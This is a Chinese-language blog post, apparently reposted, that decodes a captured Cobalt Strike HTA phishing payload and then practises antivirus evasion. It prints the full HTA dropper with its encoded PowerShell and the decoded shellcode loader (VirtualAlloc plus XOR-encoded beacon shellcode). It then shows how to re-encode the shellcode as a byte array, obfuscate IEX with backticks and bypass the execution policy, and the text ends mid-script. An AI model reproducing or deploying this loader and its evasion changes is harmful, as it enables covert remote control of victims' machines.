碼上快樂

相關內容    簡體    繁體

CS hta上線=>Powershell混淆解密=>簡單混淆免殺實踐

本文轉載自   查看原文   2021-03-08 17:15   309    滲透/ 免殺

前言

演練項目,抓到一個Cs的hta形式的powershell木馬,通過hta釣魚上線,Payload是Powershell

解密

其實根據態勢感知流量分析已經獲得了公網IP,出於興趣解密一下
腳本如下:

<script language="VBScript">
	Function var_func()
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		var_shell.run "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWABhADIALwBpAHkAQgBMADkASABIADYARgBQADAAUQBDAGEAdwBoAEwATQBPAFEAeABxADAAaABqAEcAeABzAE0AMgBBAEYATQBlAEMANgBLAG0AdQA3AEcAbQBQAGkARgAzAGMAWQA0AE8ALwBQAGYAdAAyAHcAZwBtADkAbgBKADcAQgAzAHAAMwBvAHQAawAwAGUANgB1AHEAcQA0ADYAZABiAHEANgBiAEYASgAyAFoAYgBMAFEAeABrAHoAMwBDAGUAVwB1AHgAagBTAE0AYgBOAC8AagBhAG8AWABDAFoAZABQAFgARwBQAGYAQQBmAFMAawBXADEAcgBHAEgAVwBUAGEAZABEAFoANAB0AHkAcAA2AEQAMABNAGYAUABpAEoAQwBRAFIAaABIADMAWgArAEcAaQBqADAATABrAGMAcQBYAEwAUABRAHEAZgBYAFoALwBFAEQAaQAxAHoAKwBVAHMAbQBTAEUAawBjAFUAdgA3AGkAbwBuAEMAUgBUADgAVgBlAGgATgBiADAAMgBVAFAATQAzAHQATgBuAGwANwBLAE4AVAB5AEwAWQBxAEwAUQBRAGcANgBEAHAAdQA4AGoAMgBsAHAAOAAvAHkAMwBFAFkAVQBvADgAZAAzAHkAcwB0AHkAcwBRAG8AbwB1ADcASwBzAFcAbABVADQAcgBtAHYAMwBHAFIARABRADMAcgAxAHUATgBwAFMAegBMAGcALwB1AGMAdgBuAFMAcwB2AHgAVgA4AGcANQBpAGEAVQB5AHcAaABzAEkAUwBQAFIASQB0AHQAYgB6AE0AYwBvAGkAcQBKAGkAQgBZADcATgBTADgAWQA4AC8AaQB2AHoAaQA2AG4AcABaAFUAWABZAHgAYwBxAEoAUwAwAFUAdwBqAFIAdAAwAEsAYwBaAHcAaQB6ADMAMwBqAHMAdwAxAEgAYQBVAEIATABSAGQAMwBHAG8AUgAvADUAYQAxAGEAWgAyAEoANQBRAHEAegB6AGwAMwBoAHUANQA4AC8AcgBSADkAeQBKAC8AaQBzAHcASwBFAE0AVAB4ADgAeQBBAHoAcQAwAGUAZABVAGgARwBHAGYAYwBCAEcAUABHAEoAWQBMAEgATwBMAGIATAAvAEYAYwBzAGwAOQBlAGYATgBtAEcASAB2AE0AZABtAGwARgA4AHgAZwBOAC8AYwBDAGsANABkADcARwBOAEsAcQAwAGsAVQBjAGMATwBxAFIAcgBVAEMAdABHAGsARAA3AFAASwB2AEwAZwBSAEUAaABaAEgASAByAGMAMgBSAGYAUQAyAC8AcwB2AHQASABUAHAAeABZADUAVABCAHIAdQBMAFgANwBXADcATABCAGsAMABPAFkAUAA3AHEAMABxAGwAOQAwAG8AZwAxAFcAYwBoAFgAegA1AHgANABsAGYAZwAwAEgAUABlAEgATQAxAEIATwBEADkANAAvADQANQBjAFAAUAB4ACsASQBCAGgAZgArAEYAYgA0AGcASwBxAEUATwB0AFIAQwBqAEQANAB6AHcAUABjAGQAVgB3AHMAWABGADQAdAA4AFMAQwBHAGUAVQB0ACsAUAA3AEYAegB2AGcAYQB1AFcATwBSADIAYwBRAE0AdwBQADAAeQB5AGQAbwB6AEMAbQAvAFAATAB2AC8AQgB5ADMAUABXAHQARwA1AFoAOABhAHUAagA1AHIAbgBYAFMATwA2AFQAbgA2ADgAYwBBAHQAeAByADUATgBsAG8AVQBMAHYAbgBCAGkAVAB6AGIALwB2AEkAcAB0AGgAOQBBAHcAVwAvAC8ANQBhAFcAagBTAHQAZQAzAFIAWgB1AG8AaAAxADgAWgBuAHcAcABjACsAeQBoAGwAZABPAHoAVABIAG8AMwBJAFcATQA4AEQAUABVAHYARwAwAFEARQBuAHoAaABFADQAeABBADMAVAB4AG8ANQByAGkAMgB1AHgATgBWAHoAbwA2AEoAMgBMAEkAZQB3AFIAZQBBAFMAWAA0ADcANQAwADUANQByAEIAVQAxAEQAeQBkAHUAbwBEAGYAOABSADEAbwBlAHIAbQBHAFkAMABiAFAAMABxAGUAagBsAFoANQAzAHoAOQA0AHoATABzAHMATwBpAHEASQB5ADEANAAvAGgAbgBPAE0AeQBaADEATABrAFUARgBMAG0AUgBDACsAeQBUADAAdABpAHoAUAB4ADgAVwBQAHoAYgBYAFQAMQAyAG0ASQAxAFIAeABNADcAbQBsAHYAdwBIAGsASgA2ADIAbABuADAAUABUAGsAeQBNAEkAYgBzAEEAdwA4AGcATQBLAEwAYQBSAGsANgBGAFMANQB0AG8AMgBvAFYASgBxADIAdABiAFoAaABlAEsASABtAE0AagBJAGMAZQBEAEkAZwBhAFUAOQA1AEEAUgBtAE0AaQB4AE0AbABuAEUAbQBKAE8AVgAvADgAbwBPAHYAbQBKAFIAcABiAHUAQgBRAEYANgBUAHoASwBxAFEANgB5AEkASwBhAGMAegBwAFIATwBkADIAUQBSAFUAbgB4AFgAOQB3ACsAbgA1AFAAagBvAGMAaQB3AE8AbwBQADAAegBtAGsAZwBnAE8AbgA0AHIATQB5AE4ANwBaAEIAQgBYAFMAdQBXAGYAeQBEAGUAZgArAGYAZQA5AHkAWABtAE8AegBmAGwAawBKADQAUwBXAGMAbwBQADQAawBKAEsAVwBYAFoAYwBjAGsAbQBjAFgAUwA0AFAAYgAxAGoAbQB5AEkAVQBNAFUARgBOAEQAMwA1AFYAUQBSAEcALwBxAFoAbAA3AEcAUwBrAFgAaABMAHQANQBwAHEAYgA0AGQAMwBJAFEAdABaAGEAKwAyAGQAMgAxAGwAQgBNADgAZQBIAG0ARwBuAEsAcgAxAGUAWgB4AGgASQB3AHgANQBXADQAcwBkACsAdQA5AHAAWgBhADQATwA3AFoAagAxAE8AWQBpADAAZQBTAFYAVgBCAHIAWQBMAGMANgA2ADYAbAByAEwAWAA5AG8AegArADcAagB0ADMANgBOAFEAbQAwAHYAUQBGAHoAMABlADIAdQBIAFQAVwAxAGYAVgBOAHMAMQAzAGEAKwBlAG0AUABaADkAeQBjADcAUgAvADMAQgBLAHIAbABlAFQAVABYADEAZAB0AFYAUwA2ACsAMQB4AHAARwBiAHkAYgBXADAAdgBxAFQAdgA1ADMAbwBmAHgAYgA5AHAAZQA5AGoAdQBnAGQAMwBjAFQAZQBGAEoAQwA2AGwAVABwADMATgBCAHAARAB5AGMAQwB1ADYAUABJAE8AcQBUAGQAOABTAGUAegBlAHQAMABhAHAAMABaAHYAcgBBAFMARwA2AFoASABlADYAbgBxAGcAZABvAHoAWABtAHMASQBPAFYAZABJAGUAVgBvAGsAUwB6AGMAbAA0AHAAdwBqADkAVgBUAGUAQQBPAEQAWABCAE0AbQArADgAVABtAHEAYQBVAG8AcABmAFkAcgBFAHYANgAxAHYAYwBOAG4AcQBrAHUANwB0AHIAawBOAGQAYQBxAGgAcAAxAHcATwBGAGcAcAB2AHAAbQBkAGsATQBPAGUASwBvAG0AZQBHAHIAMAAwAHYAYgBNAGEASQBIAGQAWABUAHkAeAA2AG0AMwBkAEYATQBDADIAUwBRADQASgBlAFkAbwBlAE8AeQBNADIARQAvAHIASQByAGEAZQBwAFYANQBlADEAcgBYAGIAbwA0AFkAQwBOAHAANQAyAGIARQBLAFYAeQAwAEwAUABwAFMAbABxAHoAVABMAGYAVABtADEAdQBkAGUANABVAGQALwBUAFAATgBZAFUAcgBBAHQAdABNAGUATgBiAHQAZwAyADUATgAxAEgAWABLAEIARwBpAHAAOQBBAHAAbAB1AFoASQBPAHQAdQAzAEMAbgAyAGYAbwAyAHYAZABsAGkAdwBVAGgAMABPAHAAMwAzAFoANwBZACsAVwBZAG0AZABWADgAawAxAGIAQwB4AFkAMAA3AFYAZwBOAE8AaABoAE4AcABVAEYANAAxADcAZQBEAEsAMgBaADYARAA5AE4ATABlAEkAaQBWADcATAB4AG8ASgBHAFEAVwBvAGYATgBhADUAMwBEAFAARwBuAFkAcQB5AG4AWgBrAFUAbAB3AEkASgA3ADQAUwBHAHIAegBoAEMAUQBOAEIANwBuADMAcgBtAGkAUgBVAEcANQBGAEgAZQAwAHcAagAwAFIAUABiADIAbgBDAGYARABCADAAbABNAGYAWgB5ADcAQQAxAEcAdQBPADUAVwBHAHYAbwBrADYAZQBnAFAANgBwAHEAdQBtAHAAVgBSADIATABDAHgASgBIAFMARwBBADAAYwAwAGgAMAA4ADMAYgBkAGEAbwBoAEgAagBWAHUAQwBLAEIAOQA5AFEARABsAGEAVABRAEQANgBHADEAYwBQAFQAawAyAGcAdwBrAHUAagBqADUAbABDAGIAaQBRAEkAWgBtAGkAOABrAHMANQBmAGIAawBDADEAagBQADUAdQBvAGgAMQBWADcAbQBNAHcAOQBKAGUANgBhAC8ALwArADQAWgByAFgATwBLADUAWABJAGIAMQBoAHcAYgB0AFUATgA3AG0ARwBoADIAbABWAGIAawBnAFgAMgBxAFYAUwBiADcAMgBhAHQAegBxAEgAcABTAGMATABNAHYAZgBaAG0AbgB1AG8AMQAzAFEANABqAHQAZQBBAGEAZQBXAG8ATgBpAHcAMQBoAEQAbQB0AE4AZAA3AHgAYgAxAFcAYQB5AFYASQBzADAAbABMAHgAcwBWAFQAZQBSAGMAVABMAGYAegBqAHkAagByAGcAcgAzAHIAMwBRAGEAVABkAFMARQB2AGEANABIAC8AdABPAHMASgBYAFoAVgA0AFAAZgBjAEQAYQB5AFoAcAB6AHoAaQBOAHIARgBYAEUAMgBMAGoAQwBYADYARQBQAFEAVABrAGoAWABkADQATwBrACsAYQBIAG4ARgB4AEcAegAvAE8ASgA4AEYAKwBiAG0AbAB0AGwARwB4AEMAKwBaADkANABBAE0AKwByAEQAUwBRAFIANABLAGsANQBNAFgAcgBhAEsALwBDADUARwBtADIAMQBtAHIANABsAEMAcgB2AGQAQwBNADAAVwA4AEQAQgB4AGcAUwAvAEEASQAvAHUAVAAxADAAbAAyAEUAZgBBADAAMQBaAHQAYQBhAG0AUgBjAFAAVABBAFUAUwBqAGwAWAByADkAZgBPAFQAaAA3AFkAOQBlADUAcQBPADQANwBtAHQAMwBVADkANwBnAHIAcwBGAFMAcwBTADUARwArAFQANQAyAHUAawBKAGwAVgBUAGsAUQBhAFoAcgBhADIAVwBQAEQAeABrAEYAVwBuAHQAaAA5AEIAagBIAEwASgA3ACsAMwBjAE8ALwBxADgAYwB4AHIAMwBWAEgASwBnADAAVQBNAFMAeQArAFUAKwBmACsATwB6AHUAZgAxAHQAWgBYAEIANgBXADUAMQA3AHQANwBmADEAcQBkAFEAQgByAFEAaQBPAHIAWAAvAG4ASwBIAHIAMgByAFcAagA5AHIAZwBIAFEAVQBSAGgAdgBrAFEARABXAEQASgB1AFoAOABCAGEAbAArAHEASgA1AGEAawBiADUAdgBaAHgAcQBsADAAcwBmAGQAOAB3AHMATgBQAGUAcABBAFoAdwBtADkANQA3AGwAdwBpADQANwBqADQANgB4ADUAKwBrAGsAWABBADYAMwBjAHMAYwBGAGEAdwBnAFgAMQBCAEUATwBoADkAdQBHAEkANQA5ADQARQBvAFcATQA2AHgAcgBTAEsAMQArAHUAOAB3AFQAaABGAGUATwA2AHoAegBvAEsAZgBQADgAOABoAHYAUABJADcARQBIAHYAVQBzADkAaQBtAHoARgBVAFAAUQByAFYAYQB6AGYANwByAFYAYgA3AHcANgA3AEQASQBmAHAAQwBXADMAcwB5AFYAcwB3AGIAcgBuAFMAZgB2AGQAMwBMAHkAbgBmAGcAVAArAG0ASABzAHUAZgBSAC8AbQBJAEQAdgBOAHYAMwBQADAARwBiAGcANQBUADMAYQBHADMAUwA1AFEAeAAvAGoAeABSAGUASwBYAHcAbwBGAGIAYwAyADkAbQA0AC8AcwBWAC8AZwBDAG8AVAB2AHUATAB1AGQAZQBCAEYAUgBuAFYAMQB0AC8AQgBaADgAcgArAGYAMQBiAHUAawBRADgAcAB5AGwAVAA3AGgASgB4ADMANwBnAHIAQwBFACsATQBoAEIAcAA4AHMANABSAFcAbgBGADMARwAzAFAARQBUADcAQwB1AFgASQBQAHUAbwArAEoAVQBiAFUAawB5AGgAaABiADcAcQArAEMAdABnAEsAWQBXAGUASwBqAE8AZABHADgAbQBFAFkAZQA0AHYAVgBXAG0ATABJADkATQBOAEEAQQBBAD0AIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=", 0, true
	End Function

	var_func
	self.close
</script>

base64后

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

發現將base64解碼存入流中,然后有Gzip解壓縮在通過Invoke-Expression將字符作為命令執行
可以使用如下腳本解密

$data = [System.Convert]::FromBase64String('gzip base64')
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
$sr.ReadToEnd() | set-clipboard

或者將base64_decode后的powershell代碼修改為

(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()|Out-File decode.txt

把上述代碼保存為ps1腳本然后執行,POwershell提示禁止執行該腳本,這里涉及到了執行策略的問題
可以如下代碼解決
powershell -exec bypass -file .\encode.ps1
解密得到

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuAPCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMeXZPYiMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3dRSkdGTVcMFg0TCgNvYWFxbHRwZnEuKSMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGY2JzeBd/c3l7FhcLc30KFGBgChReB2ZqYGJxDnB3Ym1nYnFnDmJtd2p1anF2cA53ZnB3DmVqb2YCB2sIawkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBmNic3gXfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEBoNEhMVDRITFw0SEBQjIyMjIw==')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

powershell的上線方式也是通過VirtualAlloc分配內存然后執行Cs的shellcode,shellcode存放在了$var_code變量中

免殺實踐

這里根據一些師傅的免殺文章中的一些方法來簡單實踐一下

提取shellcode,修改關鍵字

首先Cs生成一個Powershell木馬

然后我們可以直接將$var_code里的shellcode提取出來,提取出來是ascii碼形式,然后嘗試修改下IEX命令,通過添加`反引號,原意是轉義,這里不影響執行
提取shellcode並且通過Foreach格式化一下

$code=""
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('base64_shellcode代碼')
$s|foreach{$code=$code+$_.ToString()+','}
$code|Out-File shellcode_Decode.txt

然后將Ascii碼樣式直接放入shellcode變量中
再修改IEX為i`e`x

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code =(223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,154,1,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,89,71,100,20,35,49,46,125,92,54,198,245,90,211,67,88,10,191,110,37,106,173,192,149,168,197,191,34,218,90,121,63,241,237,244,44,173,50,112,4,107,127,117,204,116,68,111,32,53,182,99,27,146,17,71,194,98,74,211,255,172,128,163,150,23,117,158,182,13,91,14,157,184,166,165,236,246,116,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,23,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,27,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,10,46,41,35,0,140,45,72,90,98,218,209,144,163,168,151,88,95,24,75,49,102,96,245,126,79,69,230,33,227,58,166,209,119,179,172,89,143,194,217,82,198,14,235,121,156,154,67,111,88,46,158,207,146,199,101,135,90,28,153,239,62,255,53,47,214,143,132,209,63,186,55,12,107,142,11,195,69,100,67,98,6,130,164,244,33,79,31,83,232,7,251,153,61,109,253,227,132,178,136,89,149,47,183,67,8,172,211,210,184,168,133,223,114,200,234,123,85,61,37,75,50,169,192,131,146,116,225,71,2,14,23,192,185,221,118,136,189,20,11,37,110,43,63,66,18,144,39,155,233,41,212,199,193,197,60,177,156,58,93,56,109,49,190,194,26,13,80,169,229,35,158,39,55,208,72,124,221,206,193,40,50,223,229,141,41,154,113,174,204,143,137,49,66,221,14,188,208,157,181,165,90,117,131,43,0,101,55,155,121,38,140,254,70,34,34,228,111,225,244,64,182,94,145,119,239,38,49,139,152,249,202,55,39,222,50,170,171,209,44,66,181,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,26,17,13,18,21,27,13,17,17,21,13,18,16,18,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

